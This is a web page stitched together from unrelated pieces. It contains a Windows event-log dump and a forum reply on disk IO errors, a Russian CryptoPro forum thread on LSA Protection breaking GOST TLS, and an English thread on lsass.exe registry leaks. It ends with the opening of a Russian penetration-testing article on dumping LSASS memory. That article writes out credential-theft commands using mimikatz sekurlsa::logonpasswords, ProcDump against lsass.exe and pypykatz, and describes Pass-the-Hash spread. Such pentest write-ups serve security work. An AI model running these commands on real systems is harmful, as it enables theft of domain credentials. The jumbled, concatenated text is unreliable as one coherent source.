A provider, MS_NT_EVENTLOG_EVENT_PROVIDER, has been registered in the Windows Management Instrumentation namespace Root\CIMV2 to use the LocalSystem account. This account is privileged and the provider may cause a security violation if it does not correctly impersonate user requests.
Log: ‘Application’ Date/Time: 08/01/2015 3:01:51 PM
Type: Warning Category: 0
Event: 63 Source: Microsoft-Windows-WMI
A provider, HiPerfCooker_v1, has been registered in the Windows Management Instrumentation namespace Root\WMI to use the LocalSystem account. This account is privileged and the provider may cause a security violation if it does not correctly impersonate user requests.
Log: ‘Application’ Date/Time: 08/01/2015 3:01:51 PM
Type: Warning Category: 0
Event: 63 Source: Microsoft-Windows-WMI
A provider, HiPerfCooker_v1, has been registered in the Windows Management Instrumentation namespace Root\WMI to use the LocalSystem account. This account is privileged and the provider may cause a security violation if it does not correctly impersonate user requests.
Log: ‘Application’ Date/Time: 08/01/2015 3:01:51 PM
Type: Warning Category: 0
Event: 63 Source: Microsoft-Windows-WMI
A provider, CommandLineEventConsumer, has been registered in the Windows Management Instrumentation namespace root\default to use the LocalSystem account. This account is privileged and the provider may cause a security violation if it does not correctly impersonate user requests.
Log: ‘Application’ Date/Time: 08/01/2015 3:01:51 PM
Type: Warning Category: 0
Event: 63 Source: Microsoft-Windows-WMI
A provider, CommandLineEventConsumer, has been registered in the Windows Management Instrumentation namespace root\default to use the LocalSystem account. This account is privileged and the provider may cause a security violation if it does not correctly impersonate user requests.
Log: ‘Application’ Date/Time: 08/01/2015 3:01:51 PM
Type: Warning Category: 0
Event: 63 Source: Microsoft-Windows-WMI
A provider, LogFileEventConsumer, has been registered in the Windows Management Instrumentation namespace root\default to use the LocalSystem account. This account is privileged and the provider may cause a security violation if it does not correctly impersonate user requests.
Log: ‘Application’ Date/Time: 08/01/2015 3:01:51 PM
Type: Warning Category: 0
Event: 63 Source: Microsoft-Windows-WMI
A provider, LogFileEventConsumer, has been registered in the Windows Management Instrumentation namespace root\default to use the LocalSystem account. This account is privileged and the provider may cause a security violation if it does not correctly impersonate user requests.
Log: ‘Application’ Date/Time: 08/01/2015 3:01:51 PM
Type: Warning Category: 0
Event: 63 Source: Microsoft-Windows-WMI
A provider, ActiveScriptEventConsumer, has been registered in the Windows Management Instrumentation namespace root\default to use the LocalSystem account. This account is privileged and the provider may cause a security violation if it does not correctly impersonate user requests.
Log: ‘Application’ Date/Time: 08/01/2015 3:01:51 PM
Type: Warning Category: 0
Event: 63 Source: Microsoft-Windows-WMI
A provider, ActiveScriptEventConsumer, has been registered in the Windows Management Instrumentation namespace root\default to use the LocalSystem account. This account is privileged and the provider may cause a security violation if it does not correctly impersonate user requests.
Log: ‘Application’ Date/Time: 08/01/2015 3:01:51 PM
Type: Warning Category: 0
Event: 63 Source: Microsoft-Windows-WMI
A provider, ActiveScriptEventConsumer, has been registered in the Windows Management Instrumentation namespace root\subscription to use the LocalSystem account. This account is privileged and the provider may cause a security violation if it does not correctly impersonate user requests.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
‘System’ Log — Critical Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: ‘System’ Date/Time: 07/01/2015 6:12:03 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: ‘System’ Date/Time: 07/01/2015 12:42:37 AM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
‘System’ Log — Error Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: ‘System’ Date/Time: 08/01/2015 8:58:43 PM
Type: Error Category: 0
Event: 14 Source: volsnap
The shadow copies of volume C: were aborted because of an IO failure on volume C:.
Log: ‘System’ Date/Time: 08/01/2015 6:11:00 PM
Type: Error Category: 0
Event: 14 Source: volsnap
The shadow copies of volume C: were aborted because of an IO failure on volume C:.
Log: ‘System’ Date/Time: 08/01/2015 5:15:13 PM
Type: Error Category: 0
Event: 7000 Source: Service Control Manager
The Garmin Core Update Service service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion.
Log: ‘System’ Date/Time: 08/01/2015 5:15:13 PM
Type: Error Category: 0
Event: 7009 Source: Service Control Manager
A timeout was reached (30000 milliseconds) while waiting for the Garmin Core Update Service service to connect.
Log: ‘System’ Date/Time: 08/01/2015 4:59:09 PM
Type: Error Category: 0
Event: 7032 Source: Service Control Manager
The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error: An instance of the service is already running.
Log: ‘System’ Date/Time: 08/01/2015 4:58:30 PM
Type: Error Category: 0
Event: 7031 Source: Service Control Manager
The Windows Search service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 30000 milliseconds: Restart the service.
Log: ‘System’ Date/Time: 08/01/2015 4:58:29 PM
Type: Error Category: 0
Event: 7024 Source: Service Control Manager
The Windows Search service terminated with service-specific error %%-1073473535.
Log: ‘System’ Date/Time: 08/01/2015 4:58:03 PM
Type: Error Category: 0
Event: 7000 Source: Service Control Manager
The Garmin Core Update Service service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion.
Log: ‘System’ Date/Time: 08/01/2015 4:58:03 PM
Type: Error Category: 0
Event: 7009 Source: Service Control Manager
A timeout was reached (30000 milliseconds) while waiting for the Garmin Core Update Service service to connect.
Log: ‘System’ Date/Time: 08/01/2015 4:52:29 PM
Type: Error Category: 0
Event: 14 Source: volsnap
The shadow copies of volume C: were aborted because of an IO failure on volume C:.
Log: ‘System’ Date/Time: 08/01/2015 4:46:31 PM
Type: Error Category: 0
Event: 14 Source: volsnap
The shadow copies of volume C: were aborted because of an IO failure on volume C:.
Log: ‘System’ Date/Time: 08/01/2015 4:23:49 PM
Type: Error Category: 0
Event: 14 Source: volsnap
The shadow copies of volume C: were aborted because of an IO failure on volume C:.
Log: ‘System’ Date/Time: 08/01/2015 4:20:05 PM
Type: Error Category: 0
Event: 7000 Source: Service Control Manager
The Garmin Core Update Service service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion.
Log: ‘System’ Date/Time: 08/01/2015 4:20:05 PM
Type: Error Category: 0
Event: 7009 Source: Service Control Manager
A timeout was reached (30000 milliseconds) while waiting for the Garmin Core Update Service service to connect.
Log: ‘System’ Date/Time: 08/01/2015 4:15:08 PM
Type: Error Category: 0
Event: 7000 Source: Service Control Manager
The Garmin Core Update Service service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion.
Log: ‘System’ Date/Time: 08/01/2015 4:15:08 PM
Type: Error Category: 0
Event: 7009 Source: Service Control Manager
A timeout was reached (30000 milliseconds) while waiting for the Garmin Core Update Service service to connect.
Log: ‘System’ Date/Time: 08/01/2015 3:58:46 PM
Type: Error Category: 0
Event: 14 Source: volsnap
The shadow copies of volume C: were aborted because of an IO failure on volume C:.
Log: ‘System’ Date/Time: 08/01/2015 3:56:00 PM
Type: Error Category: 0
Event: 36887 Source: Schannel
The following fatal alert was received: 40.
Log: ‘System’ Date/Time: 08/01/2015 3:31:58 PM
Type: Error Category: 0
Event: 14 Source: volsnap
The shadow copies of volume C: were aborted because of an IO failure on volume C:.
Log: ‘System’ Date/Time: 08/01/2015 3:02:43 PM
Type: Error Category: 0
Event: 14332 Source: Microsoft-Windows-WMPNSS-Service
Service ‘WMPNetworkSvc’ did not start correctly because CoCreateInstance(CLSID_UPnPDeviceFinder) encountered error ‘0x80004005’. Verify that the UPnPHost service is running and that the UPnPHost component of Windows is installed properly.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
‘System’ Log — Information Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: ‘System’ Date/Time: 08/01/2015 9:21:10 PM
Type: Information Category: 0
Event: 7036 Source: Service Control Manager
The Software Protection service entered the running state.
Log: ‘System’ Date/Time: 08/01/2015 9:21:04 PM
Type: Information Category: 0
Event: 7036 Source: Service Control Manager
The Microsoft Software Shadow Copy Provider service entered the running state.
Log: ‘System’ Date/Time: 08/01/2015 9:21:04 PM
Type: Information Category: 0
Event: 7036 Source: Service Control Manager
The Volume Shadow Copy service entered the running state.
Log: ‘System’ Date/Time: 08/01/2015 9:21:03 PM
Type: Information Category: 0
Event: 7036 Source: Service Control Manager
The Portable Device Enumerator Service service entered the running state.
Log: ‘System’ Date/Time: 08/01/2015 9:21:03 PM
Type: Information Category: 0
Event: 7036 Source: Service Control Manager
The Application Experience service entered the running state.
Log: ‘System’ Date/Time: 08/01/2015 9:21:01 PM
Type: Information Category: 0
Event: 7036 Source: Service Control Manager
The Multimedia Class Scheduler service entered the running state.
Log: ‘System’ Date/Time: 08/01/2015 9:11:08 PM
Type: Information Category: 0
Event: 7036 Source: Service Control Manager
The Microsoft Software Shadow Copy Provider service entered the stopped state.
Log: ‘System’ Date/Time: 08/01/2015 9:10:00 PM
Type: Information Category: 0
Event: 7036 Source: Service Control Manager
The Software Protection service entered the stopped state.
Log: ‘System’ Date/Time: 08/01/2015 9:08:08 PM
Type: Information Category: 0
Event: 7036 Source: Service Control Manager
The Volume Shadow Copy service entered the stopped state.
Log: ‘System’ Date/Time: 08/01/2015 9:07:35 PM
Type: Information Category: 0
Event: 7036 Source: Service Control Manager
The Application Experience service entered the stopped state.
Log: ‘System’ Date/Time: 08/01/2015 9:05:04 PM
Type: Information Category: 0
Event: 7036 Source: Service Control Manager
The Volume Shadow Copy service entered the running state.
Log: ‘System’ Date/Time: 08/01/2015 9:04:59 PM
Type: Information Category: 0
Event: 7036 Source: Service Control Manager
The Software Protection service entered the running state.
Log: ‘System’ Date/Time: 08/01/2015 9:03:49 PM
Type: Information Category: 0
Event: 7036 Source: Service Control Manager
The Volume Shadow Copy service entered the stopped state.
Log: ‘System’ Date/Time: 08/01/2015 9:03:45 PM
Type: Information Category: 0
Event: 7036 Source: Service Control Manager
The Multimedia Class Scheduler service entered the stopped state.
Log: ‘System’ Date/Time: 08/01/2015 9:03:00 PM
Type: Information Category: 0
Event: 7036 Source: Service Control Manager
The Adobe Flash Player Update Service service entered the stopped state.
Log: ‘System’ Date/Time: 08/01/2015 9:03:00 PM
Type: Information Category: 0
Event: 7036 Source: Service Control Manager
The Adobe Flash Player Update Service service entered the running state.
Log: ‘System’ Date/Time: 08/01/2015 8:58:44 PM
Type: Information Category: 0
Event: 7036 Source: Service Control Manager
The Multimedia Class Scheduler service entered the running state.
Log: ‘System’ Date/Time: 08/01/2015 8:57:46 PM
Type: Information Category: 0
Event: 7036 Source: Service Control Manager
The Microsoft Software Shadow Copy Provider service entered the running state.
Log: ‘System’ Date/Time: 08/01/2015 8:57:46 PM
Type: Information Category: 0
Event: 7036 Source: Service Control Manager
The Volume Shadow Copy service entered the running state.
Log: ‘System’ Date/Time: 08/01/2015 8:57:35 PM
Type: Information Category: 0
Event: 7036 Source: Service Control Manager
The Application Experience service entered the running state.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
‘System’ Log — Warning Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: ‘System’ Date/Time: 08/01/2015 8:58:43 PM
Type: Warning Category: 2
Event: 57 Source: Ntfs
The system failed to flush data to the transaction log. Corruption may occur.
Log: ‘System’ Date/Time: 08/01/2015 5:14:22 PM
Type: Warning Category: 0
Event: 11 Source: Microsoft-Windows-Wininit
Custom dynamic link libraries are being loaded for every application. The system administrator should review the list of libraries to ensure they are related to trusted applications.
Log: ‘System’ Date/Time: 08/01/2015 5:13:19 PM
Type: Warning Category: 0
Event: 4001 Source: Microsoft-Windows-WLAN-AutoConfig
WLAN AutoConfig service has successfully stopped.
Log: ‘System’ Date/Time: 08/01/2015 5:13:19 PM
Type: Warning Category: 0
Event: 10002 Source: Microsoft-Windows-WLAN-AutoConfig
WLAN Extensibility Module has stopped. Module Path: C:\Windows\System32\bcmihvsrv64.dll
Log: ‘System’ Date/Time: 08/01/2015 4:57:29 PM
Type: Warning Category: 0
Event: 11 Source: Microsoft-Windows-Wininit
Custom dynamic link libraries are being loaded for every application. The system administrator should review the list of libraries to ensure they are related to trusted applications.
Log: ‘System’ Date/Time: 08/01/2015 4:52:29 PM
Type: Warning Category: 2
Event: 57 Source: Ntfs
The system failed to flush data to the transaction log. Corruption may occur.
Log: ‘System’ Date/Time: 08/01/2015 4:46:31 PM
Type: Warning Category: 2
Event: 57 Source: Ntfs
The system failed to flush data to the transaction log. Corruption may occur.
Log: ‘System’ Date/Time: 08/01/2015 4:19:13 PM
Type: Warning Category: 0
Event: 11 Source: Microsoft-Windows-Wininit
Custom dynamic link libraries are being loaded for every application. The system administrator should review the list of libraries to ensure they are related to trusted applications.
Log: ‘System’ Date/Time: 08/01/2015 4:18:25 PM
Type: Warning Category: 0
Event: 4001 Source: Microsoft-Windows-WLAN-AutoConfig
WLAN AutoConfig service has successfully stopped.
Log: ‘System’ Date/Time: 08/01/2015 4:18:25 PM
Type: Warning Category: 0
Event: 10002 Source: Microsoft-Windows-WLAN-AutoConfig
WLAN Extensibility Module has stopped. Module Path: C:\Windows\System32\bcmihvsrv64.dll
Log: ‘System’ Date/Time: 08/01/2015 4:14:21 PM
Type: Warning Category: 0
Event: 11 Source: Microsoft-Windows-Wininit
Custom dynamic link libraries are being loaded for every application. The system administrator should review the list of libraries to ensure they are related to trusted applications.
Log: ‘System’ Date/Time: 08/01/2015 4:13:39 PM
Type: Warning Category: 0
Event: 4001 Source: Microsoft-Windows-WLAN-AutoConfig
WLAN AutoConfig service has successfully stopped.
Log: ‘System’ Date/Time: 08/01/2015 4:13:39 PM
Type: Warning Category: 0
Event: 10002 Source: Microsoft-Windows-WLAN-AutoConfig
WLAN Extensibility Module has stopped. Module Path: C:\Windows\System32\bcmihvsrv64.dll
Log: ‘System’ Date/Time: 08/01/2015 3:58:46 PM
Type: Warning Category: 2
Event: 57 Source: Ntfs
The system failed to flush data to the transaction log. Corruption may occur.
Log: ‘System’ Date/Time: 08/01/2015 3:31:58 PM
Type: Warning Category: 2
Event: 57 Source: Ntfs
The system failed to flush data to the transaction log. Corruption may occur.
Log: ‘System’ Date/Time: 08/01/2015 3:01:14 PM
Type: Warning Category: 0
Event: 11 Source: Microsoft-Windows-Wininit
Custom dynamic link libraries are being loaded for every application. The system administrator should review the list of libraries to ensure they are related to trusted applications.
Log: ‘System’ Date/Time: 08/01/2015 3:00:34 PM
Type: Warning Category: 0
Event: 4001 Source: Microsoft-Windows-WLAN-AutoConfig
WLAN AutoConfig service has successfully stopped.
Log: ‘System’ Date/Time: 08/01/2015 3:00:34 PM
Type: Warning Category: 0
Event: 10002 Source: Microsoft-Windows-WLAN-AutoConfig
WLAN Extensibility Module has stopped. Module Path: C:\Windows\System32\bcmihvsrv64.dll
Log: ‘System’ Date/Time: 08/01/2015 2:39:21 PM
Type: Warning Category: 0
Event: 11 Source: Microsoft-Windows-Wininit
Custom dynamic link libraries are being loaded for every application. The system administrator should review the list of libraries to ensure they are related to trusted applications.
Log: ‘System’ Date/Time: 08/01/2015 2:38:28 PM
Type: Warning Category: 0
Event: 4001 Source: Microsoft-Windows-WLAN-AutoConfig
WLAN AutoConfig service has successfully stopped.
-
-
#4
IO error are finicky. Just a guess … turn off the computer and reseat the cables both data and power to the drive and mobo. I had an ext hd with this issue and the data cable had jiggled loose with time. Works fine after reseating.
-
-
#5
There are many many comments.
- Joined
- Aug 25, 2013
- Posts
- 30
-
-
#6
Since the following showed up in the event viewer: The shadow copies of Volume C were aborted because of an IO failure on volume C
IO error are finicky. Just a guess … turn off the computer and reseat the cables both data and power to the drive and mobo. I had an ext hd with this issue and the data cable had jiggled loose with time. Works fine after reseating.
- Joined
- Aug 25, 2013
- Posts
- 30
-
-
#7
Also, have you Googled this: The specified object was not found (0x80042308
There are many many comments.
jcgriff2
Co-Founder / Admin
BSOD Instructor/Expert
Microsoft MVP (Ret.)
Has Sysnative Forums helped you? Please consider donating to help us support the site!
-
Microsoft Support & Malware Removal
-
Windows 7 | Windows Vista
|
katbert |
|
|
Статус: Участник Группы: Участники Сказал(а) «Спасибо»: 4 раз |
После включения в домене режима LSA Protection (ключ реестра RunAsPPL=1) на машинах с Win10 и КриптоПро — перестали открываться порталы, использующие ГОСТ TLS. Помогает восстановление КриптпПро. На двух из затронутых машин — была версия 4.0.9975 Цитата: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\lsass.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\Crypto Pro\Shared\pkivalidator.dll that did not meet the Microsoft signing level requirements. Вопрос — в чем может быть проблема? Если бы файлы не были подписаны должным образом доя совместимости с LSA Protection — то восстановление не помогло бы. А если файлы уже подписаны должным образом — то чему ломаться? |
|
|
|
|
two_oceans |
|
|
Статус: Эксперт Группы: Участники Откуда: Иркутская область Сказал(а) «Спасибо»: 110 раз |
Действительно, интересно. Ключ при восстановлении не вернулся в прежнее значение? |
|
|
|
|
Захар Тихонов |
|
|
Статус: Сотрудник Группы: Участники Откуда: Калининград Сказал «Спасибо»: 39 раз |
Автор: katbert После включения в домене режима LSA Protection (ключ реестра RunAsPPL=1) на машинах с Win10 и КриптоПро — перестали открываться порталы, использующие ГОСТ TLS. Помогает восстановление КриптпПро. На двух из затронутых машин — была версия 4.0.9975 Цитата: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\lsass.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\Crypto Pro\Shared\pkivalidator.dll that did not meet the Microsoft signing level requirements. Вопрос — в чем может быть проблема? Если бы файлы не были подписаны должным образом доя совместимости с LSA Protection — то восстановление не помогло бы. А если файлы уже подписаны должным образом — то чему ломаться? Здравствуйте. Все зависит от того, что именно включено. Подробнее как включается\отключается описано тут https://docs.microsoft.c…7(v=ws.11)?redirectedfro В сертифицированной версии CSP (5.0 R2) уже включена поддержка IIS с включенным LSA Protected Mode. Рекомендуем установить данную сборку CSP и проверить работу https://cryptopro.ru/sit…0/CSPSetup-5.0.12000.exe |
|
Техническую поддержку оказываем тут. |
|
|
|
|
|
katbert |
|
|
Статус: Участник Группы: Участники Сказал(а) «Спасибо»: 4 раз |
Да, включалось по статье. Доменная политика создавала ключ RunAsPPL=1 в HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa |
|
|
|
|
katbert |
|
|
Статус: Участник Группы: Участники Сказал(а) «Спасибо»: 4 раз |
Режим совместимости с IIS не нужен, это обычные рабочие станции. Браузер подключается к порталам, которые используют ГОСТ TLS |
|
|
|
|
katbert |
|
|
Статус: Участник Группы: Участники Сказал(а) «Спасибо»: 4 раз |
Автор: two_oceans Действительно, интересно. Ключ при восстановлении не вернулся в прежнее значение? Политика бы снова приехала — и все сломалось бы заново. А так — однократное восстановление срабатывает Цитата: LSASS.exe запущен как защищенный процесс уровня 4. Так что все перезагрузки были с включенным LSA Protection Отредактировано пользователем 7 сентября 2022 г. 10:32:06(UTC) |
|
|
|
|
katbert |
|
|
Статус: Участник Группы: Участники Сказал(а) «Спасибо»: 4 раз |
Воспроизвел проблему на чистой виртуалке с Win 8.1 — выходит, не только на Win10 проявляется, и конфликты с другим софтом тоже можно исключить Создал ключ RunAsPPL=1, перезагрузился, и ГОСТ TLS слетел — браузер ругается на невозможность отображения страницы |
|
|
|
|
Захар Тихонов |
|
|
Статус: Сотрудник Группы: Участники Откуда: Калининград Сказал «Спасибо»: 39 раз |
В сертифицированной версии CSP (5.0 R2) уже включена поддержка IIS с включенным LSA Protected Mode. Рекомендуем установить данную сборку CSP и проверить работу |
|
Техническую поддержку оказываем тут. |
|
|
|
|
|
katbert |
|
|
Статус: Участник Группы: Участники Сказал(а) «Спасибо»: 4 раз |
На стенде попробую, скорее всего будет работать. В боевой сети на единственной машине с КриптоПро 5.0 — после включения LSA Protection проблем не возникло. Но как массовое решение — не пойдет. Переход с версии 4 на 5 — платный же. Пока хотелось бы понять, это бага или фича На моем стенде с отвалившимся ГОСТ TLS — какие есть способы диагностики? На Win8.1 в журнал CodeIntegrity ничего не пишется |
|
|
|
|
katbert |
|
|
Статус: Участник Группы: Участники Сказал(а) «Спасибо»: 4 раз |
На тестовой виртуалке Win 8.1 + КриптоПро 5.0 R2 после включения LSA Protection проблем не возникло. ГОСТ TLS работает. |
|
|
|
| Пользователи, просматривающие эту тему |
|
Guest (2) |
Быстрый переход
Вы не можете создавать новые темы в этом форуме.
Вы не можете отвечать в этом форуме.
Вы не можете удалять Ваши сообщения в этом форуме.
Вы не можете редактировать Ваши сообщения в этом форуме.
Вы не можете создавать опросы в этом форуме.
Вы не можете голосовать в этом форуме.
- Thread Author
-
-
#1
Hi there,
I have been having some issues with windows crashing and restarting recently. I think that I have that part of it fixed….. however there are still some error messages popping up in Event Viewer…. one of which revolves around lsass.exe
Log Name: Application
Source: Microsoft-Windows-User Profiles Service
Date: 11/30/2012 1:41:17 PM
Event ID: 1530
Task Category: None
Level: Warning
Keywords:
User: SYSTEM
Computer: MarksTC
Description:
Windows detected your registry file is still in use by other applications or services. The file will be unloaded now. The applications or services that hold your registry file may not function properly afterwards.
DETAIL —
5 user registry handles leaked from \Registry\User\S-1-5-21-1541781749-630166740-1203472716-1000:
Process 544 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-1541781749-630166740-1203472716-1000
Process 544 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-1541781749-630166740-1203472716-1000
Process 544 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-1541781749-630166740-1203472716-1000\Software\Microsoft\SystemCertificates\My
Process 544 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-1541781749-630166740-1203472716-1000\Software\Microsoft\SystemCertificates\CA
Process 544 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-1541781749-630166740-1203472716-1000\Software\Microsoft\SystemCertificates\Disallowed
Event Xml:
<Event xmlns=»http://schemas.microsoft.com/win/2004/08/events/event»>
<System>
<Provider Name=»Microsoft-Windows-User Profiles Service» Guid=»{89B1E9F0-5AFF-44A6-9B44-0A07A7CE5845}» />
<EventID>1530</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=»2012-11-30T21:41:17.815496600Z» />
<EventRecordID>107647</EventRecordID>
<Correlation />
<Execution ProcessID=»912″ ThreadID=»3804″ />
<Channel>Application</Channel>
<Computer>MarksTC</Computer>
<Security UserID=»S-1-5-18″ />
</System>
<EventData Name=»EVENT_HIVE_LEAK»>
<Data Name=»Detail»>5 user registry handles leaked from \Registry\User\S-1-5-21-1541781749-630166740-1203472716-1000:
Process 544 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-1541781749-630166740-1203472716-1000
Process 544 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-1541781749-630166740-1203472716-1000
Process 544 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-1541781749-630166740-1203472716-1000\Software\Microsoft\SystemCertificates\My
Process 544 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-1541781749-630166740-1203472716-1000\Software\Microsoft\SystemCertificates\CA
Process 544 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-1541781749-630166740-1203472716-1000\Software\Microsoft\SystemCertificates\Disallowed
</Data>
</EventData>
</Event>
I have made sure that all windows updates are current, and i have norton running… no viruses, etc. Any thoughts on how to resolve?
-
Pauli
Isass.exe is basically a Windows legitimate application. It should be ok if it is located in C:\Windows\System32, in other cases it is probably a virus.
The easiest way would be to make a simple search for Isass.exe, and if found elsewhere than System32 folder, delete it, or zip it to a safe place, and the delete the original.
-
-
#2
Isass.exe is basically a Windows legitimate application. It should be ok if it is located in C:\Windows\System32, in other cases it is probably a virus.
The easiest way would be to make a simple search for Isass.exe, and if found elsewhere than System32 folder, delete it, or zip it to a safe place, and the delete the original.
Время на прочтение12 мин
Количество просмотров55K
Здравствуйте, хабролюди!
Меня зовут @snovvcrash, и я работаю в отделе анализа защищенности компании Angara Security. Отвечаю я, значится, за инфраструктурный пентест, и в этой статье я хотел бы поговорить об одном из самых эффективных методов добычи учетных данных на «внутряке» — извлечении секретов из памяти процесса lsass.exe (MITRE ATT&CK T1003.001) — и, в частности, об особенностях реализации этого метода в ру-сегменте тестирования на проникновение.
За два года работы пентестером мои нервы были изрядно потрепаны нашим любимым отечественным антивирусным решением Kaspersky Endpoint Security (далее — KES), который установлен у каждого первого второго нашего клиента, и который, в отличие от других средств антивирусной защиты, наглухо блокирует все попытки потенциального злоумышленника получить доступ к lsass.exe (не реклама!).
Далее я расскажу свой опыт использования и кастомизации публично доступных инструментов, которые в разные промежутки времени позволяли мне сдампить память LSASS при активном «Касперском». Погнали!
Краткий ликбез
Если не сильно углубляться в теорию, то Local Security Authority Subsystem Service (он же LSASS) — это процесс (исполняемый файл C:\Windows\System32\lsass.exe), ответственный за управление разными подсистемами аутентификации ОС Windows. Среди его задач: проверка «кред» локальных и доменных аккаунтов в ходе различных сценариев запроса доступа к системе, генерация токенов безопасности для активных сессий пользователей, работа с провайдерами поддержки безопасности (Security Support Provider, SSP) и др.
Для нас, как для этичных хакеров, ключевым значением обладает тот факт, что в домене Active Directory правит концепция единого входа Single Sign-On (SSO), благодаря которой процесс lsass.exe хранит в себе разные материалы аутентификации залогиненных пользователей, например, NT-хеши и билеты Kerberos, чтобы «пользаку» не приходилось печатать свой паролЪ в вылезающем на экране окошке каждые 5 минут. В «лучшие» времена из LSASS можно было потащить пароли в открытом виде в силу активности протокола WDigest (HTTP дайджест-аутентификация), но начиная с версии ОС Windows Server 2008 R2 вендор решил не включать этот механизм по умолчанию.
Несмотря на то, что в 2к22 при успешном дампе LSASS злоумышленнику чаще всего остается довольствоваться NT-хешами и билетами Kerberos, это все равно с большой вероятностью позволит ему повысить свои привилегии в доменной среде AD за короткий промежуток времени. Реализуя схемы Pass-the-Hash, Overpass-the-Hash и Pass-the-Ticket, злоумышленник может быстро распространиться по сети горизонтально, собирая по пути все больше хешей и «тикетов», что в конечном итоге дарует ему «ключи от Королевства» в виде данных аутентификации администратора домена.
Экскурс в историю дампов LSASS
Рассмотрим первопроходцев в ремесле извлечения данных аутентификации из памяти LSASS.
Mimikatz
Было бы преступлением не начать повествование с такого мастодонта в области потрошения подсистем аутентификации Windows как Mimikatz, которым хоть раз пользовался любой пентестер.
Модуль sekurlsa::logonpasswords позволяет «налету» парсить память lsass.exe с целью поиска секретиков без сохранения соответствующего дампа на диск. Этот инструмент поистине произвел революцию в наступательных операциях и положил начало многим другим исследованием в области извлечения чувствительной информации с хостов под управлением Windows.
Cmd
C:\>mimikatz.exe
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # log out.txt
mimikatz # sekurlsa::logonpasswords full
mimikatz # exit
C:\>mimikatz.exe "privilege::debug" "token::elevate" "log out.txt" "sekurlsa::logonpasswords full" "exit"
К сожалению для пентестеров, вендоры AV / EDR быстро «просекли фишку» и стали относиться к «Мимику» <sarkazm>как к самому опасному ПО, созданному за всю историю человечества</sarkazm>, поэтому на сегодняшний момент он пригоден лишь как пособие для изучения реализованных в нем техник — для их переосмысления и переизобретения в собственных инструментах.
На заметку: официальная вики Mimikatz покрывает далеко не все его возможности, поэтому энтузиасты InfoSec-комьюнити создали вот такой замечательный ресурс, которым я рекомендую пользоваться в случае возникновения вопросов, что делает та или иная команда этого замечательного инструмента.
ProcDump
Другим фаворитом внутренних пентестов долгое время был метод создания снимка памяти LSASS с помощью служебной программы ProcDump из состава Windows Sysinternals. Этот инструмент позволяет создавать дампы процессов с целью их дальнейшего анализа, и процесс lsass.exe тому не исключение (если права позволяют, разумеется, хе-хе).
Cmd
C:\>procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp
Теперь можно притащить слепленный дамп к себе на тачку и распарсить его с помощью того же Mimikatz.
Cmd
C:\>mimikatz.exe
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords full
mimikatz # exit
C:\>mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords full" "exit"
Или его аналога для Linux – Pypykatz.
Cmd
~$ pypykatz lsa minidump lsass.dmp
Прелесть этого метода заключается в том, что все необходимые операции по созданию слепка памяти выполняет ProcDump, подписанный Microsoft, и этичному взломщику не требуется тащить на хост никакой малвари. Однако разработчики корпоративных антивирусных решений тоже долго не стояли в стороне и оперативно прикрыли возможность делать дампы LSASS с помощью ProcDump, включив его в разряд PDM:HackTool.Win32.CreDump.rbaa.
comsvcs.dll
Безусловно, интересной находкой стало обнаружение экспорта функции MiniDumpW в системной библиотеке C:\Windows\System32\comsvcs.dll, которая дергает вызов Win32 API MiniDumpWriteDump и позволяет делать слепки процессов в рамках концепции Living Off The Land Binaries And Scripts (LOLBAS), когда злоумышленнику не нужно приносить ничего лишнего на атакуемую машину.
Эта библиотека легла в основу первых версий замечательной утилиты lsassy, позволяющей делать слепки LSASS и удаленно читать необходимые области памяти созданного дампа, а не перенаправлять его целиком на машину атакующего (подробнее о принципе работы можно почитать в блоге автора утилиты).
